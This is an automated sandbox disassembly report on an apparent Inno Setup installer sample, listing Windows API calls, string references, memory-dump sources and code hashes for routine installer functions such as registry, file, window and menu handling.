                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                                                            • RegCreateKeyEx, xrefs: 004545C3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateFormatMessageQueryValue
                                                                                            • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                            • API String ID: 2481121983-1280779767
                                                                                            • Opcode ID: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                            • Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
                                                                                            • Opcode Fuzzy Hash: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                            • Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
                                                                                            APIs
                                                                                              • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                              • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
                                                                                            • CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
                                                                                            • SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
                                                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
                                                                                              • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                            • DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                            • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                            • API String ID: 1549857992-2312673372
                                                                                            • Opcode ID: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                            • Instruction ID: 18f462a79ff6f3765b6ab1b49dcd34ad23a8ddcce266b6658739bc0f5698dca4
                                                                                            • Opcode Fuzzy Hash: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                            • Instruction Fuzzy Hash: 61414C70A40208AFDF00EBA5DD42F9E7BB8EB08714F52457AF510F7291D7799E008B68
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressCloseHandleModuleProc
                                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                                                            • API String ID: 4190037839-2312295185
                                                                                            • Opcode ID: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                            • Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
                                                                                            • Opcode Fuzzy Hash: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                            • Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
                                                                                            APIs
                                                                                            • GetActiveWindow.USER32 ref: 004629FC
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
                                                                                            • GetWindowRect.USER32(?,00000000), ref: 00462A76
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                            • API String ID: 2610873146-3407710046
                                                                                            • Opcode ID: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                            • Instruction ID: 865a179037155f8fdabe2954c964c2dd38b7d55406d5d1e7c7801a7b23b437f8
                                                                                            • Opcode Fuzzy Hash: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                            • Instruction Fuzzy Hash: B7219575701B057BD610D6A88D85F3B36D8EB84715F094A2AF944DB3C1E6F8EC018B9A
                                                                                            APIs
                                                                                            • GetActiveWindow.USER32 ref: 0042F194
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                                                            • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                            • API String ID: 2610873146-3407710046
                                                                                            • Opcode ID: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                            • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                                                            • Opcode Fuzzy Hash: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                            • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                                                            APIs
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,02113858,00000000), ref: 00458C79
                                                                                            • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
                                                                                            • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
                                                                                            • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000), ref: 00458D55
                                                                                            • GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000), ref: 00458D5C
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                            • String ID: CreateEvent$TransactNamedPipe
                                                                                            • API String ID: 2182916169-3012584893
                                                                                            • Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                            • Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
                                                                                            • Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                            • Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
                                                                                            • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
                                                                                            • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                            • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                            • API String ID: 1914119943-2711329623
                                                                                            • Opcode ID: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                            • Instruction ID: d1bb8c6bfccdc0522a96f5e3020b18907c52df716e7671809b7eaf465cfb4023
                                                                                            • Opcode Fuzzy Hash: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                            • Instruction Fuzzy Hash: 6831A375A00604AFDB41EFAACC12D5BB7BDEB8970675244A6FD04D3352DB38DD08CA28
                                                                                            APIs
                                                                                            • RectVisible.GDI32(?,?), ref: 00416E13
                                                                                            • SaveDC.GDI32(?), ref: 00416E27
                                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                                                            • RestoreDC.GDI32(?,?), ref: 00416E65
                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                                                            • FrameRect.USER32(?,?,?), ref: 00416F18
                                                                                            • DeleteObject.GDI32(?), ref: 00416F22
                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                                                            • FrameRect.USER32(?,?,?), ref: 00416F65
                                                                                            • DeleteObject.GDI32(?), ref: 00416F6F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                            • String ID:
                                                                                            • API String ID: 375863564-0
                                                                                            • Opcode ID: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                            • Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
                                                                                            • Opcode Fuzzy Hash: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                            • Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                            • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                            • String ID:
                                                                                            • API String ID: 1694776339-0
                                                                                            • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                            • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                            • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                            • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                            APIs
                                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
                                                                                            • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                                                            • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                                                            • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                                                            • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                                                            • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                                                            • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                                                            • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Delete$EnableItem$System
                                                                                            • String ID:
                                                                                            • API String ID: 3985193851-0
                                                                                            • Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                            • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                                                            • Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                            • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(10000000), ref: 00481A11
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00481A25
                                                                                            • SendNotifyMessageA.USER32(0001042E,00000496,00002710,00000000), ref: 00481A97
                                                                                            Strings
                                                                                            • Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
                                                                                            • Deinitializing Setup., xrefs: 00481872
                                                                                            • Restarting Windows., xrefs: 00481A72
                                                                                            • DeinitializeSetup, xrefs: 0048190D
                                                                                            • GetCustomSetupExitCode, xrefs: 004818B1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary$MessageNotifySend
                                                                                            • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                            • API String ID: 3817813901-1884538726
                                                                                            • Opcode ID: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                            • Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
                                                                                            • Opcode Fuzzy Hash: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                            • Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
                                                                                            APIs
                                                                                            • SHGetMalloc.SHELL32(?), ref: 004616C7
                                                                                            • GetActiveWindow.USER32 ref: 0046172B
                                                                                            • CoInitialize.OLE32(00000000), ref: 0046173F
                                                                                            • SHBrowseForFolder.SHELL32(?), ref: 00461756
                                                                                            • CoUninitialize.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
                                                                                            • SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
                                                                                            • SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                            • String ID: A
                                                                                            • API String ID: 2684663990-3554254475
                                                                                            • Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                            • Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
                                                                                            • Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                            • Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
                                                                                              • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
                                                                                              • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
